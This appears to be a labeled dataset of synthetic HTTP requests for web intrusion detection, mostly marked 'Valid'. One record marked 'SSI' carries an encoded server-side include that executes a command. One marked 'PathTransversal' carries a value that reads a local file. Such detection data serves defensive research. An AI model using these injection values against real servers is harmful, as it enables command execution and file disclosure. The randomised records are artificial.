If-Range: Sat, 31 Jan 04 13:44:47 CET
Max-Forwards: 305
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic YW53aWVhOmRzM21hZWh2
Authorization: hEmo3 gtAictP=eytcrh
Range: 777-8861,-671902,43-427
Referer: http://www.rprneEct.be/zTlslOe.php
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.4 (compatible; MSIE 6.0; Linux i586; ri23trLs)
UA-CPU: StrongARM
UA-Disp: 222,458,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 011x9947
Via: HTTP/7.0 www.TliXt.png, numrrt/0.3 241.169.255.255:5157
Transfer-Encoding: compress
Upgrade: zflt/3.2, paby/1.7, ges/5.4, den/9.0, ioa/1.3
Warning: 278 www.2Nmfe.png "0irSv" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 72290
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13018
Start - Id: 28530
class: Valid
GET /iathb/0VyKJexecI/ix1pisG56dq/BM2hopenlsOONYI-q.png?1e=0ia&tlt=sdargtls&Qdstty=baemEdure%3Eo8lsr HTTP/1.0
Host: www.rateae.de
Connection: keep-alive
Accept: image/*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 86.240.167.85
Cookie: t6y=pq cds;5nn8unita5naw=adit
Cookie2: $Version="202"
Date: Tue, 22 Jun 04 12:30:38 UTC
ETag: "8DVUS.kNUOfqcr9H"
Expect: ojalicF
From: oSchO@nretCorwsa.st
If-Modified-Since: Sun, 22 Feb 09 06:17:58 GMT
If-Unmodified-Since: Fri, 02 Nov 07 01:29:43 UTC
If-Match: "y3.bC-H6Ze0rcR3K"
If-None-Match: "tDuvsv39d.jq.XDT5GJf"
If-Range: *
Max-Forwards: 691
MIME-Version: 6.5
Pragma: sh='trnl6g'
Proxy-Authorization: rfNki eds412id=t8vE
Authorization: Basic ZXdud2FxZTphYWh0bw==
Range: -365020,-470833
Referer: http://www.ulklt7.de/6vnv/da4Tp/sVsDizno/rcbsdn3.jpeg
TE: chunked;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 1.7; lL-pl; rv:3.2.3) Gecko/80646483
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 116x668
Via: 8.1 23.131.28.47:96
Transfer-Encoding: gzip
Upgrade: ssc6/7.2
Warning: 648 www.ttih.html "ord3rsoanoeqih" "Mon, 01 Jan 07 08:14:14 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28530
Start - Id: 30088
class: Valid
GET /gGOWlQij0Eri58B7AV5L/0so1henctseoralitr/-L1z_OG/gtvhttpf9/ozCS5tnq/shmnzaqfedoc/eSnqta/fsshtrokul3elo0tak/htaccesZ@QGe4-_Bv/8J6ZP/znthsjiookehoaii.asmx?a1Kro9iierE=sharreatLytseatcia&XUFDaccess_log=%2FUttu&hosnHa=eksEu&@bFxd=215550&dihualtlikAe=r+0d&T@LWy-MW=eudkqw0i HTTP/1.1
Host: www.Sjhapdfn.org:000
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.5, x-mac-korean
Accept-Encoding: 
Accept-Language: ee-so
Cache-Control: no-cache
Client-ip: 99.158.113.120
Cookie: hsrdyCfle5atag=98;e1vradsR2rifI=581;se=2945853334;nN=r6w2tcres5rlwadtI;7SrUhZgroup byV=eitdtrst
Cookie2: $Version="23"
Date: Wed, 08 Jun 05 09:01:07 GMT
ETag: W/"Ocoimis9INXKn05DKM"
Expect: 100-continue
From: uaHi@yedijoahj.de
If-Modified-Since: Thu, 26 Jun 08 20:06:06 GMT
If-Unmodified-Since: Tue, 01 Jul 08 13:59:47 GMT
If-Match: "HqhfjY@K4oSuI5UdB7Ev"
If-None-Match: "AOUg15CcuHIdj8X"
If-Range: Thu, 15 Feb 07 24:00:51 CET
Max-Forwards: 4549
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: iete7e saeS1was=ejuohF
Authorization: eusrb oaUM=teyle
Range: -551
Referer: /sbwtniyh/3nqha/smamna/imz5Bto/yeie7sr.nsf
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 8.5; yl-i9; rv:9.6.4) Gecko/98620027
UA-CPU: x86
UA-Disp: 978,2584,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x0520
Via: 3.7 121.244.135.16
Transfer-Encoding: gzip
Upgrade: AajeA/4.4
Warning: 922 172.195.36.87 "f6tmena1" "Fri, 19 Dec 08 22:12:57 CET"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 131299472861769232
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30088
Start - Id: 11684
class: Valid
GET /sinmym0atw/Nh/vnaihpentbge/t3Henuntcvr/p9sl0cjs8t8/oofuauTFd9248j/fB8T6u6gsVjJ.gif?hta=9501366316&8gDieeyerto1=iobvxsflJ HTTP/1.0
Host: 130.60.201.236
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-7, x-mac-korean;q=0.4, euc-kr, windows-1258;q=0.6, windows-1252
Accept-Encoding: identity, compress
Accept-Language: *
Cache-Control: max-stale=5
Client-ip: 37.188.138.86
Cookie: Wjlv=427443;mThgwLeaO=o7z5.zDQu;0Ernrt9rbss=deileaoaaTt
Cookie2: $Version="5"
Date: Thu, 24 Aug 06 01:13:38 UTC
ETag: W/"i@m2uYHFEOVqJN8bk-Y"
Expect: 100-continue
From: eehue@vTiniitte.gov
If-Modified-Since: Tue, 08 Sep 09 07:31:29 UTC
If-Unmodified-Since: Wed, 17 Mar 04 02:19:02 UTC
If-Match: "Hvo5P@pf.ps_gPADwed"
If-None-Match: "NgAk6wqbF4iiNYf"
If-Range: "y0vNNsnvEgEigMk"
Max-Forwards: 158
MIME-Version: 2.8
Pragma: e2ateu4s='ar'
Proxy-Authorization: Digest response="d23CB2FCd6e9A6000fbAcB3afe17C8A7"
Authorization: Digest qop=auth
Range: 114947-,-367
Referer: /hgdpTsoa/7ertoqe/tjiweuk/usrcur8m/Rmeth0Gg.pl
TE: deflate,trailers
Trailer: TE
User-Agent: rehsrriab/9.7.3
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9473x212
Via: pasC/7.6 www.7yoae.html, 8.4 14.149.225.111, HTTP/0.2 www.vhdlws.png
Transfer-Encoding: identity
Upgrade: ntra/3.2, Eeei/8.5, esr/3.1, sHd4/8.0, wte/4.0
Warning: 457 70.235.212.144 "iexnltsprfrmWp" 
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11684
Start - Id: 44750
class: PathTransversal
GET /mI4lRkCl6b3p983Y/rLl/tH98PRLZz1X-bc2B4F/ovu/t_XwmEHQoNgLSfA/eenhueTiNsoRMH/5ptif6Tnduhdqomq9.jpg?Th27rsi=orot&eHhsmheSIbe0aoe=dO+t&ecc1=tJ7yY&esoteeaet8itv3p=ehtaccesoi&ieeFteej=%3Fdi&omkvTniays=254&ITailNn=rvhh&DO3Zdq=dZha&ihnsvvva=11566878&germmt3srdna=collection%28+file%3A%2F%2F%2Fc%3A%2FNdAex%2FasieT.xml+++++%29&JLqSlservices=i7GMM8y&semen1i=ky3bvneh HTTP/1.0
Host: 214.171.82.48:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-3, x-mac-ce, windows-1250;q=0.6, ks_c_5601-1987;q=0.7
Accept-Encoding: 
Accept-Language: efeatne-obhw79a, i-N2h2agi
Cache-Control: d5ei='q0r1'
Client-ip: 45.186.49.209
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="80"
Date: Mon, 26 Apr 04 22:35:15 UTC
ETag: "NxGNKHZyoiZDQDfNgr"
Expect: seeEneF
From: rairnenr@fiohetan.org
If-Modified-Since: Sun, 29 May 05 14:18:10 CET
If-Unmodified-Since: Mon, 02 Jan 06 17:12:06 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Dec 05 19:31:06 CET
Max-Forwards: 9552
MIME-Version: 7.9
Pragma: e00c='d'
Authorization: Digest nonce
Range: 027680-5,4627-
Referer: http://ytiecrio.ch/ettse.conf
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 6.9; 6o-rd; rv:4.9.2) Gecko/22478340
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: a7t2da
Upgrade: Qya/6.2
Warning: 079 www.n1cn.tiff "meawmehgeEqekttk" "Tue, 06 Jul 04 17:24:32 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44750
Start - Id: 26308
class: Valid
GET /eiaaecsUeae1Un/hPTNBiBQNHY_JkP/eSc53d53TEe/y-7eg3VJItqFxwMTtQrV/frSacdmtsaloeRkln.php?J7cq_b9Ity4=tgbrandu&btrawstmtieo=21636564&To8amnmki3jnt=652294646&ihkOdkrie=ito7O+teoidocumentehgelac HTTP/1.1
Host: 139.249.126.146:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.2, x-mac-icelandic;q=0.5, x-mac-chinesesimp;q=0.2, cp-950, x-mac-cyrillic;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 55.156.173.255
Cookie: 1afesdsg=OElikecSt$otwxl tstdhi;5eHxh=851328;go02bgsoundns=cehpdeiiSc5a2@icptelnet;lNdsI=(;dih;izrH=cHRai1e
Cookie2: $Version="90"
Date: Mon, 02 May 05 21:13:41 GMT
ETag: "wP.pVv6NkD6cB36Mm"
Expect: 100-continue
From: teed6sis@nesteei.biz
If-Modified-Since: Sun, 08 Mar 09 23:05:23 CET
If-Unmodified-Since: Sun, 01 Feb 04 11:01:24 CET
If-Match: *
If-None-Match: "VQ0o906Otg3xPYnvlzTf"
If-Range: *
Max-Forwards: 94
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Adal quAd4eh=bitares
Authorization: NTLM c2luc3d0aWlhdGVzMncwdGM2dHJwbHBPeWxzZXByZW5haW5hdG9u
Range: 84172-,41-,023007-
Referer: http://TWmei1.uk/aeeafd7l/ebpShi.gif
TE: trailers
Trailer: Upgrade
User-Agent: e9tt (sOch.9; smJqNJ6o.; e9EwJv)
UA-CPU: StrongARM
UA-Disp: 052,216,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3902x9522
Via: HTTP/3.5 www.esGot3r.tiff, 4.0 www.lnSnehi.jpeg, HTTP/2.8 www.Vrnhi.css
Transfer-Encoding: deflate
Upgrade: gto/1.7, wveJ/2.2, uRseO/7.7
Warning: 505 www.i0e1ateH.gif "k3cpb0eut6nh3" "Fri, 02 Jun 06 13:47:27 CET"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 8772849575
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26308
Start - Id: 15470
class: Valid
GET /edTRx455ADNw/7D./tTet9sq3rta75Ts/ienrts/oWXC1Z./rQPNjxUpcANu/r4/venthnnajyc/bQRfjB_/468f2eRsLqFejXagX61x.jpeg?tonohfR=negt%261ogtautoexec%3E&s3rI4Kd=wh%7C%3B HTTP/1.1
Host: 251.248.14.215
Connection: close
Accept: application/x-tar
Accept-Charset: x-mac-icelandic, x-mac-chinesesimp, x-mac-ce;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=027
Client-ip: 8.102.178.123
Cookie: etaj7glnl=096276
Cookie2: $Version="2"
Date: Fri, 05 Mar 04 13:45:08 GMT
ETag: "GfcjBRnV1rnhFX.xaXW"
Expect: 100-continue
From: ob3Wdni@tbetshmkn.de
If-Modified-Since: Sun, 22 Jan 06 21:46:14 GMT
If-Unmodified-Since: Sun, 09 Nov 08 18:06:58 GMT
If-Match: *
If-None-Match: *
If-Range: "XNAupkkNJtEF9oLy1"
Max-Forwards: 176
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: zS7e stsaewg=oet2
Authorization: NTLM eWVzbGxlaXVlcmVlbXR0N2I2cmZHMm5kc2VlYk1yZmlzcm9n
Range: 14-
Referer: http://www.ra8ymoS.org/Nsavc/uio0a/tbAr/tazI.zip
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.1 (X11; U; Linux i386 2.1; ts-ew; rv:4.1.6) Gecko/44693350
UA-CPU: Sparc
UA-Disp: 0411,934,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1725x7516
Via: 4.3 245.15.158.103, FTP/3.4 www.nnca.htm, FTP/5.7 www.irrmr.gif
Transfer-Encoding: deflate
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 740 www.tindaC.shtml:1990 "frsnphme2n4i5tcrd" 
X-Forwarded-For: 10.6.38.7
X-Serial-Number: 83246160630295135066
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15470
Start - Id: 20878
class: Valid
GET /sRN9aCe6RlvjCcyT/2W9wy/ae.png?Era=27638790&usoluslol=4&0aiosuisdsre=ipfpdz+Kc+%5Ctdvm%25u&YIci=9613808044 HTTP/1.1
Host: www.poseam.com:80
Connection: gtej
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=3435
Client-ip: 188.162.242.211
Cookie: hf=?haccess_log s0>Ee;acmllrnwvYl=Fuvl;tbza2=8995;F.VlocationA=etet0sock_stream2r;dD;anbstNiwuOca4r=Ox2~e;noo=0102984
Cookie2: $Version="591"
Date: Fri, 15 Aug 08 04:23:06 GMT
ETag: W/"6Zfr8mlm3ZhdZvUY1"
Expect: ef4mTus
From: 3llAde@ardeO.st
If-Modified-Since: Wed, 18 Feb 09 20:17:33 UTC
If-Unmodified-Since: Sat, 24 Nov 07 04:42:59 CET
If-Match: "jZDfYZR-s80TizsCSA1l"
If-None-Match: "fuvuxn2r0qShyRkfVW_"
If-Range: Thu, 14 Oct 04 05:14:31 UTC
Max-Forwards: 64
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest nc=DeFA0D0a
Authorization: NTLM cm9saWlkbGx0SW5yZmVzVG90ajlvdDNtYWlzcmFucDJ0Z2V0bnQ2
Range: 90-96,-579803,-6
Referer: /htes/oo9s/mNpceeZt/thewtr.php3
TE: chunked;q=0.8,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: ergRyoioee
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0585x0395
Via: HTTP/3.8 www.8aot.gif, 2.9 www.tsihnais.css:75, seh/4.8 216.119.107.89
Transfer-Encoding: gzip
Upgrade: l2sonl/9.3, rwue/0.0
Warning: 436 135.104.177.87:1264 "dhiTIi5ayllgdbbitob" 
X-Forwarded-For: 183.219.223.187
X-Serial-Number: 961731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20878
Start - Id: 14752
class: Valid
GET /rtovnyeOca/E0ow8httpsPQX_/lv8gx1SkuzsLADJ/r1KUU@vkYpzDpI/ho5cvzKyW@_GH2XvIgT9/in6rctmeitnhq/AEUJf1KBOAb/4ttMfZclr.php4? HTTP/1.1
Host: 172.195.125.236
Connection: saaoeF
Accept: audio/basic;q=0.2, application/*;q=0.2, text/*;q=0.7
Accept-Charset: gb2312;q=0.8, x-mac-roman, utf-7, iso-2022-jp;q=0.5, euc-tw
Accept-Encoding: identity;q=0.6, deflate;q=0.2
Accept-Language: rce5-nClaoe43, 1u-d
Cache-Control: max-age=73
Client-ip: 157.191.153.50
Cookie: aa9aTR=32;gTSBr6@NbN=window.opene;Wml=eyAT5FjL.eH8;i80retweaAleequ=noaotek9cqr
Cookie2: $Version="8"
Date: Tue, 25 Dec 07 03:45:56 GMT
ETag: W/"tCbqoq6D.mb74GAjvP"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Sun, 04 Apr 10 12:01:53 UTC
If-Unmodified-Since: Wed, 15 Jul 09 24:33:34 UTC
If-Match: "jaCFAMOBVF_h9dgOrTb"
If-None-Match: *
If-Range: Mon, 20 Jun 05 23:21:11 CET
Max-Forwards: 004
MIME-Version: 6.6
Pragma: ih='o2n2et2u'
Proxy-Authorization: el3ew eon38=myylbi
Authorization: NTLM cGNzcnZsZ2VydEl1ZXJmc3RsZXRlM2gyZTRwNm5qcjhldDVjYQ==
Range: 48-90
Referer: http://eaeltgs.net/ewdrt.exe
TE: trailers,trailers
Trailer: Accept
User-Agent: l8fS6hEo http://www.trliyens.org
UA-CPU: StrongARM
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 283x1210
Via: HTTP/5.7 www.ciirpd.tiff, 4.1 www.hrp0a.png
Transfer-Encoding: gzip
Upgrade: fnhcG/7.7, 5Uaboe/0.6, satvhh/2.7
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 9387335
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14752
Start - Id: 34121
class: Valid
PUT /aspxucehnheEaal1i.js? HTTP/1.1
Content-Length: 229
Content-Language: ds,xg,teepx
Content-Encoding: identity
Content-Location: http://www.gnh0one.cz/oHnc.zip
Content-MD5: ZHNsOXNoZm5lN0xlVHROaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Jan 05 14:07:54 UTC
Last-Modified: Fri, 01 Jun 07 19:09:13 GMT
Host: www.5eieseb.uk
Connection: close
Accept: application/*, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ann-l5te;q=0.3, uy-cTso3, a4eu-d;q=0.3
Cache-Control: cestncts=Hsbklerx
Client-ip: 66.198.113.70
Cookie: gegoe=lRFOBrRd;nreseeS=8869736;uwNcrismNte=aepdrs;oajaiEtliGihhdo=1568;wea=z8kP@
Cookie2: $Version="6"
Date: Thu, 05 Feb 09 07:44:41 UTC
ETag: W/"Gr76h629A_HpPTpeA"
Expect: etwta=fwts6;9czg=3esloi6c
From: uye7h@kdo2f.gov
If-Modified-Since: Wed, 09 Aug 06 10:07:22 CET
If-Unmodified-Since: Sat, 17 May 08 01:46:47 UTC
If-Match: "yKz2wPK9LUpNNwlPMT"
If-None-Match: *
If-Range: "mxowoJ5hT2ZlPDSE-f"
Max-Forwards: 897
MIME-Version: 3.1
Pragma: i=poi5e
Proxy-Authorization: owhsta 4olearsa=siesthr
Authorization: NTLM MndjcG5jc2hobmVOaXlFdWJscGVjb3hoUDNJYW82cmRlNW9mczRNZnM=
Range: 60682-89,69-,94-
Referer: /niiuir.wav
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Ualertlm8a/7.4.2
UA-CPU: PowerPC
UA-Disp: 654,4575,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3127x6059
Via: FTP/2.7 37.154.127.15:39607, FTP/9.8 102.235.124.69
Transfer-Encoding: identity
Upgrade: e1e/1.0, 4det/7.3, 8t7kr/3.5, cltiom/7.6
Warning: 990 116.162.75.127 "atoirt3" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 18830507621799
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rteaseiqna=sVWaQzJUBu&otaNsr=4601250534&suH0oeLdbndf=dP7o&rsRs=0QUl&UPMQxtermuExmlHzAG=rh7&rWprwr9weimG=ms&q2_W82x=orautoexeco]&al8ree10nidor=151&Ipassthruoptxr=nCHHcdevsal&CCa3yscriptcreG=ni&hi3ilrtgiiaurnl=rmsystemthem> rR 

End - Id: 34121
Start - Id: 15820
class: Valid
GET /ti/mkWs_H@DkVHAkjA/Kxm0r1tXfalu/bN/50acUn3zdeleteifvH/e2bhsO/0dmn./a1eaSf/wAbN7RmZ@_KD.html?6atub8Cmki1=66xoLroeeh&s0=5iuhpositioniweno&ouas=6157&noeMLrddsmnhne=scrhmopent4e&cae=st_Cl9V1o5&nFBU8tmpbhttpbYe1=lCj&eiavixet5er=64460396&1T9yfOSsJ=0895&ogur=mbdYDJwF&tsl.a@=dm%3Bneu+tbxu&@ZeCT=Pi+2ssVcsst9emtlac8&jmailcmdOBwXSCnGg=7LssSmyxsRaMpvU HTTP/1.1
Host: 6.145.218.88:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tMjytrt-om6, L-rsiatcl, l-un, mkOktY-htup1u;q=0.3, lauweh4-emeonkS
Cache-Control: no-cache
Client-ip: 97.141.13.193
Cookie: nvetekTase=non?;Yya6stdinVM8=3101129;2metarPaGz8R2n=aCks
Cookie2: $Version="2"
Date: Sat, 25 Sep 04 16:12:43 CET
ETag: W/"4g.i8cxBwn8B1MSmy"
Expect: BaFi6a4=Tohdnqo
From: nsmr@ahaei.uk
If-Modified-Since: Thu, 24 Apr 08 18:04:01 GMT
If-Unmodified-Since: Sat, 08 Aug 09 13:47:58 GMT
If-Match: *
If-None-Match: "2iHoNkTPjP4-Ga.UEwo1"
If-Range: Fri, 03 Oct 08 02:38:01 GMT
Max-Forwards: 58
MIME-Version: 6.0
Pragma: ft5l=g
Proxy-Authorization: Digest username="0nSl"
Authorization: ttssWe pnweEo=obouots
Range: -63889,815-78,-958
Referer: http://www.us7od.ch/stmhfaxe/Ajoe/enryaltn/nwoht.wmn
TE: trailers,trailers,chunked;q=0.1
Trailer: Max-Forwards
User-Agent: j3T9qS http://www.cihsuit.gov
UA-CPU: 68000
UA-Disp: 3222,4414,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 132x8371
Via: 0.3 49.139.247.33, 3.8 87.11.84.4, 1.5 32.17.83.123
Transfer-Encoding: compress
Upgrade: tnsap/4.9, hb3i/7.3, teoa/7.0, yetn/8.3, dof/3.7
Warning: 193 www.losl.png "jmxogwrexo6" 
X-Forwarded-For: 10.118.64.124
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15820
Start - Id: 40140
class: SSI
GET /nvn/tinf/eTAm_xml6.T/maebr2qi3o8stam6nmi/hqf/z9Az3kd9mF.gif?QBI3-Fiw=aTkOY0R&orejmiuns=015&kHe=odfeEianeeElHth&p7r1toccihsaoor=6&qufo=%3C%21+++++%23%3C%21--+%23exec+cmd%3D%22id%22--%3E&sttMeaifnbd=ote&tvs1sboO=ciT4D&gm8eoge6=cVmF&MO@7QI=a8xtyeoeIi&8hUk69FUhtpassbinA=4 HTTP/1.1
Host: 69.148.132.117:9
Connection: ailo
Accept: video/mpeg;q=0.6, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: o1='vetwun'
Client-ip: 246.182.239.2
Cookie: omsnyghontwlD4o=f(Re;dOaltmteeiab=ne;i7ceontoqi= iSyeoss2ddowe(
Cookie2: $Version="1"
Date: Sat, 17 Apr 04 22:53:21 UTC
ETag: W/"DCOhlC2QHZ8Da-F2_"
Expect: 100-continue
From: hthq3df@t0rsnSoda.org
If-Modified-Since: Tue, 23 Sep 08 17:43:18 CET
If-Unmodified-Since: Wed, 30 Aug 06 02:05:10 GMT
If-Match: "6xIEF6@p9@hnCzBLOw"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.1
Pragma: sxyoca='5ovngo'
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: dccce tifwhr=estwg
Range: 01-76865,-324119,86535-
Referer: http://www.83al.cz/fLs8adt/uffuhtek/aTpt/tnt67/leafara.gz
TE: chunked;q=0.7,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: yl7ros (t8Eu7bK2; e1Lga38vL)
UA-Disp: 5908,939,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 159x553
Via: awda/7.4 www.ttday8.htm:83985, 0.0 143.6.93.208
Transfer-Encoding: identity
Warning: 318 191.70.190.146 "iieDaosahs2o" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40140
Start - Id: 18510
class: Valid
GET /SeuhnslheNbrYrinv/nmax1g6u/mG6m0/zGC4O52t9JICk7Eoe/cUKW1yzdcxpaSBhdOV/moesd5uhdtadHvtm.tiff?Z1JiF3_=45249463&aDntd7roL4nf53h=0egyecm%5DM%2Bhdt&jitrtasav=tllt&nhT=s2dpsTiig9n&uk25r=a2muEE&4dnsogea=tdh8eln9&tatcpytealneT=9sdal0iMjepe&igroup byfs1WX=ea-odieoade0ls&uLibo=div&6feaatd4xleuAfu=dedmtuhe0hhuaa6oi&T4astusybncna=780548&1d=aW4j48Op6l&seaeseVccbo7=iif+%5C1sa+cdbaAstyle%25&d4n7is=caehhTeaedvhe HTTP/1.1
Host: www.nimle.be
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.8, gzip, identity
Accept-Language: i-pe1poIut;q=0.8, y7Otin-rcisEm
Cache-Control: no-cache
Client-ip: 190.145.101.149
Cookie: La7tNieci=o9n9pcDKk;3arws2qdd=19123;eoSeieeoyhj=ee1;jY2WO_T=78108742;rccnofhmlce8=79441732
Cookie2: $Version="098"
Date: Fri, 07 May 04 19:33:59 GMT
ETag: W/"Iwq_AF5oIHbdgL1"
Expect: eumwO4l=ltssvua;aeslNi8
From: Titeo@tuuSdemun.uk
If-Modified-Since: Mon, 30 Oct 06 24:21:49 UTC
If-Unmodified-Since: Sun, 28 Jun 09 20:37:19 UTC
If-Match: *
If-None-Match: "gBlTknLK6Pns1dD"
If-Range: *
Max-Forwards: 9995
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: Basic YXIxa3I3b1M6bXJseg==
Range: 29051-71
Referer: /awrj/le17br/mt3ih/ogzttuv/rnertTl.gif
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.4 (compatible; Konqueror/2.0; Linux i386; lsyyi3; fdestiec; wefy0a)
UA-CPU: 68000
UA-Disp: 973,9699,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 376x4288
Via: HTTP/7.3 www.cobem.jpeg, 2.1 92.55.34.242, FTP/2.9 www.eao7Tis.js
Transfer-Encoding: gzip
Upgrade: tlAedr/6.6, ae8or/3.2, l0c2rn/3.3, t3stse/1.9
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 142489460894
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18510
Start - Id: 31911
class: Valid
GET /ea70pz9/oeltu3Lpte27n/hnatdaebslt/deoame8n/thearoNtnsumenqldeU/cs8DOedo/hj3/eccAM.8rjhlFDF@t.html?rr=uca&T6jyuenyio=8&HUstdin99CSvA=upeAnarqit&nl=44369095&eh=dDtka&y3nvlsrs3=ln7lx%3Fss&aeEhheeedeyyl7=%5Baa9likecopyedkntrhseu4a HTTP/1.0
Host: 213.73.64.45:80
Connection: keep-alive
Accept: text/xml;q=0.4, video/quicktime, image/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, compress;q=0.8, deflate
Accept-Language: hbbc5n-t, i-l;q=0.8
Cache-Control: max-stale
Client-ip: 113.198.226.245
Cookie: 9uuhmy7ebct=euHfweov9dddcwif
Cookie2: $Version="417"
Date: Sun, 30 Aug 09 17:34:05 UTC
ETag: W/"SG5jVQyCNQRd8S."
Expect: 100-continue
From: haeoa@filcnbidra.net
If-Modified-Since: Sat, 10 Apr 10 14:59:03 UTC
If-Unmodified-Since: Sun, 13 Jan 08 22:13:51 GMT
If-Match: "KyQXLwyBkzV3xoWJpJi9"
If-None-Match: *
If-Range: "7hS5myF6jAhsRijy2VH"
Max-Forwards: 4
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM OGF1ZHRDNktlczh1MG9kZWhoa05kYnR0TmFzODduaHJxZ2lmaGk2YXQ2ZWRs
Authorization: Digest response="e51FfCe45aB8a5ADbEe840Fcbf2Ec079"
Range: 581-,06-0,27-
Referer: /cer6u.php3
TE: deflate,chunked;q=0.3,chunked
Trailer: Expect
User-Agent: Mozilla/0.8 (X11; U; SunOS sun4u 1.0; nh-ea; rv:1.7.0) Gecko/81453547
UA-CPU: MIPS
UA-Disp: 280,3333,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 049x223
Via: 6reJf/5.5 179.45.96.65
Transfer-Encoding: gzip
Upgrade: deed/5.3, c0CrpY/3.4
Warning: 407 69.33.215.161 "o6rodhfern" "Thu, 26 Oct 06 21:59:01 GMT"
X-Forwarded-For: 163.91.80.203
